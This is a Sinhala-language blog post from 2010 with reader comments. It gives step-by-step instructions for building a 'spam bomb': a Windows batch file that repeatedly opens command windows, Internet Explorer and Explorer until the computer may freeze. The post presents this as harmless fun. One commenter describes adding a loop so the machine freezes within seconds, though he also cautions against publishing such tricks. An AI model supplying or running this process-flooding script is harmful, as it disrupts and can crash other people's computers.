Pages

හොඳ හෝ නරක comment එකක් දාල යන්න අමතක කරන්න එපා.. :)

Thursday, June 3, 2010

පුංචි පහේ spam බෝම්බයක් හදාගන්න ඕනෙද..?


ඔන්න ආයෙත් notepad එකක් ගන්න.
පහලින් තියෙන code එක ඒකෙ type කරගන්න;









@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer


ඔය code එකේ start කියල තියෙන ඒව ඕනෙ තරම් copy paste කරගන්න. ඒව වැඩි වෙන තරමට තමයි හොඳ..

උදා:

@echo off
:A
start dir
start command
start iexplore.exe
start run
start explorer
start dir
start command
start iexplore.exe
start run
start explorer

දැන් Save as ගිහින් ඕක කැමති නමකින් හැබැයි අන්තිමට .bat කියල(අපි හදාගන්නෙ batch command file එකක් නිසා) rename කරල save කරන්න.

එච්චරයි.. දැන් අපේ පුන්චි apam bomb එක ලෑස්තියි.

මේකෙදි වෙන්නෙ මේකයි. කවුරු හරි ඔය batch file එක run කරපු ගමන් අපි code එකේ start කියල ලියල තියෙන හැම එකක්ම open වෙන්න ගන්නව.
උදා: start iexplore.exe වලින් වෙන්නෙ internet explorer එක open වෙන එක.
ඉතින් හිතන්න මේ code එක සිය පාරක් නැත්නම් ඊට වැඩි උපරිම ප්‍රමාණයක් copy paste කලොත් computer එක stuck වෙන්න උනත් පුලුවන්.

ඔයාට මේක වැඩ කරනවද බලන්න ඕනෙනම් code එක වැඩි ප්‍රමාණයක් copy paste කරන්නෙ නැතුව run කරල බලන්න. ඕක run කලාට හානියක් නෑ.

ඕක ඉතින් පොඩි පහේ ආතල් එකක් ගන්න මිසක් කිසි හානියක් කරන්නෙ නෑ.. වැඩිම වුනොත් මන් කලින් කියපු විදිහට statrt command වැඩි කලොත් computer එක stuck කරන්න පුලුවන් වෙයි..

5 comments:

  1. හික්ස්, නරක නෑ.

    ReplyDelete
  2. mekata loop ekak demmoth copy paste karanna one ne.digatama run wenawa.machine eka stuck wenawa 10sec walin withara.but kaspersky waladi nam meke 230 withara run weddi kaspersky karaya program eka turminate karanawa.windows walata nam aka turminate karanna be.a wagema man kalin kiwwa wage virus hadana hati public karanna honda ne.a nisa me wage ewa daddi deparak hithuwoth hondai.

    ReplyDelete
  3. හ්ම්.. ඒ ගැන නම් හිතන්න වෙනව තමයි.. Tnx මචන් comments වලට..

    ReplyDelete
  4. api nodanna deyak dapu ekata thx ...

    ReplyDelete